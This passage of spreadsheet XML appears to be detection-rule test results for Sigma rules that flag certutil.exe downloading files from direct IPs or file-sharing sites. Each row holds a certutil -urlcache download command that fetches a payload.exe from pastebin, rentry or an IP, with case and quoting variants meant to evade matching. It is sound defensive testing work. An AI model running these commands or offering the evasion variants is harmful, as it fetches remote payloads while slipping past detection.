        </is>
      </c>
      <c r="F627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I627" s="36" t="n"/>
      <c r="J627" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K627" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="628" ht="15.75" customHeight="1" s="42">
      <c r="A628" s="43" t="n"/>
      <c r="B628" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C628" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D628" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E628" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -SpLIT -f http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I628" s="43" t="n"/>
      <c r="J628" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K628" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="629" ht="15.75" customHeight="1" s="42">
      <c r="A629" s="43" t="n"/>
      <c r="B629" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C629" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D629" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E629" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -split -f http://0xC0000201/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I629" s="43" t="n"/>
      <c r="J629" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K629" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="630" ht="15.75" customHeight="1" s="42">
      <c r="A630" s="43" t="n"/>
      <c r="B630" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C630" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D630" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E630" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f http://testuser@192.0.2.1/example.txt C:\	emp\example.txt</t>
        </is>
      </c>
      <c r="F630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H630" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I630" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J630" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K630" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="631" ht="15.75" customHeight="1" s="42">
      <c r="A631" s="43" t="n"/>
      <c r="B631" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C631" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D631" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E631" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" /"split" -F http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F631" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G631" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H631" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I631" s="43" t="n"/>
      <c r="J631" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K631" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1" s="42">
      <c r="A632" s="43" t="n"/>
      <c r="B632" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C632" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D632" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E632" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" -SpLIt -f http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I632" s="43" t="n"/>
      <c r="J632" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K632" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="633" ht="15.75" customHeight="1" s="42">
      <c r="A633" s="43" t="n"/>
      <c r="B633" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C633" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D633" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E633" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split /"f" http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H633" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I633" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J633" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K633" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="634" ht="15.75" customHeight="1" s="42">
      <c r="A634" s="43" t="n"/>
      <c r="B634" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C634" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D634" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E634" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" -"split" -f http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F634" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G634" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H634" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I634" s="36" t="n"/>
      <c r="J634" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K634" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="635" ht="15.75" customHeight="1" s="42">
      <c r="A635" s="43" t="n"/>
      <c r="B635" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C635" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D635" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E635" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" /"split" -"f" http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F635" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G635" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H635" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I635" s="36" t="n"/>
      <c r="J635" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K635" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="636" ht="15.75" customHeight="1" s="42">
      <c r="A636" s="43" t="n"/>
      <c r="B636" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C636" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D636" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E636" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -URLCAchE -split /"f" http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F636" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G636" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H636" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I636" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J636" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K636" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="637" ht="15.75" customHeight="1" s="42">
      <c r="A637" s="43" t="n"/>
      <c r="B637" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C637" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D637" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E637" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlCACHE /"split" -F http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F637" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G637" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H637" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I637" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J637" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K637" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="638" ht="15.75" customHeight="1" s="42">
      <c r="A638" s="43" t="n"/>
      <c r="B638" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C638" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D638" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E638" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -UrLcACHE /"split" -"f" http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H638" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I638" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J638" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K638" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="639" ht="15.75" customHeight="1" s="42">
      <c r="A639" s="43" t="n"/>
      <c r="B639" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C639" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D639" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E639" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -"urlcache" /"split" -F http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I639" s="43" t="n"/>
      <c r="J639" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K639" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="640" ht="15.75" customHeight="1" s="42">
      <c r="A640" s="43" t="n"/>
      <c r="B640" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_direct_ip</t>
        </is>
      </c>
      <c r="C640" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D640" s="36" t="inlineStr">
        <is>
          <t>13e6fe51-d478-4c7e-b0f2-6da9b400a829</t>
        </is>
      </c>
      <c r="E640" s="36" t="inlineStr">
        <is>
          <t>certutil.exe /"urlcache" /"split" -f http://testuser@192.0.2.1/example.txt C:\ emp\example.txt</t>
        </is>
      </c>
      <c r="F640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I640" s="43" t="n"/>
      <c r="J640" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K640" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="641" ht="15.75" customHeight="1" s="42">
      <c r="A641" s="43" t="n"/>
      <c r="B641" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C641" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D641" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E641" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache" -split -f https://pastebin.com/raw/example123 C:\	emp\payload.exe</t>
        </is>
      </c>
      <c r="F641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I641" s="43" t="n"/>
      <c r="J641" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K641" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="642" ht="15.75" customHeight="1" s="42">
      <c r="A642" s="43" t="n"/>
      <c r="B642" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C642" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D642" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E642" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache" -SPLiT -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I642" s="43" t="n"/>
      <c r="J642" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K642" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="643" ht="15.75" customHeight="1" s="42">
      <c r="A643" s="43" t="n"/>
      <c r="B643" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C643" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D643" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E643" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache"" -split -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I643" s="43" t="n"/>
      <c r="J643" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K643" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="644" ht="15.75" customHeight="1" s="42">
      <c r="A644" s="43" t="n"/>
      <c r="B644" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C644" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D644" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E644" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-uRLcAchE" /"split" -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I644" s="43" t="n"/>
      <c r="J644" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K644" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="645" ht="15.75" customHeight="1" s="42">
      <c r="A645" s="43" t="n"/>
      <c r="B645" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C645" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D645" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E645" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-URLcAcHe" -"split" -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F645" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G645" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H645" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I645" s="43" t="n"/>
      <c r="J645" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K645" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="646" ht="15.75" customHeight="1" s="42">
      <c r="A646" s="43" t="n"/>
      <c r="B646" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C646" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D646" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E646" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-uRlCacHe" -split -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I646" s="43" t="n"/>
      <c r="J646" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K646" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="647" ht="15.75" customHeight="1" s="42">
      <c r="A647" s="43" t="n"/>
      <c r="B647" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C647" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D647" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E647" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache" -split /"f" https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I647" s="43" t="n"/>
      <c r="J647" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K647" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="648" ht="15.75" customHeight="1" s="42">
      <c r="A648" s="43" t="n"/>
      <c r="B648" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C648" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D648" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E648" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache"" /"split" -"f" https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F648" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G648" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H648" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I648" s="43" t="n"/>
      <c r="J648" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K648" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="649" ht="15.75" customHeight="1" s="42">
      <c r="A649" s="43" t="n"/>
      <c r="B649" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C649" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D649" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E649" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache" -SPLIT -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F649" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G649" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H649" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I649" s="36" t="n"/>
      <c r="J649" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K649" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="650" ht="15.75" customHeight="1" s="42">
      <c r="A650" s="43" t="n"/>
      <c r="B650" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C650" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D650" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E650" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-Urlcache" -sPLiT -"f" https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F650" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G650" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H650" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I650" s="36" t="n"/>
      <c r="J650" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K650" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1" s="42">
      <c r="A651" s="43" t="n"/>
      <c r="B651" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C651" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D651" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E651" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-urlcache"" /"split" -f https://pastebin.com/raw/example123 C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F651" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G651" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H651" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I651" s="36" t="n"/>
      <c r="J651" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K651" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1" s="42">
      <c r="A652" s="43" t="n"/>
      <c r="B652" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C652" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D652" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E652" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f https://rentry.co/example123/raw C:\	emp\payload.exe</t>
        </is>
      </c>
      <c r="F652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H652" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I652" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J652" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K652" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="653" ht="15.75" customHeight="1" s="42">
      <c r="A653" s="43" t="n"/>
      <c r="B653" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C653" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D653" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E653" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -URlcACHE -"split" -f https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H653" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I653" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J653" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K653" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="654" ht="15.75" customHeight="1" s="42">
      <c r="A654" s="43" t="n"/>
      <c r="B654" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C654" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D654" s="36" t="inlineStr">
        <is>
          <t>42a5f1e7-9603-4f6d-97ae-3f37d130d794</t>
        </is>
      </c>
      <c r="E654" s="36" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -"f" https://rentry.co/example123/raw C:\ emp\payload.exe</t>
        </is>
      </c>
      <c r="F654" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G654" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H654" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I654" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J654" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K654" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="655" ht="15.75" customHeight="1" s="42">
      <c r="A655" s="43" t="n"/>
      <c r="B655" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download_file_sharing_domains</t>
        </is>
      </c>
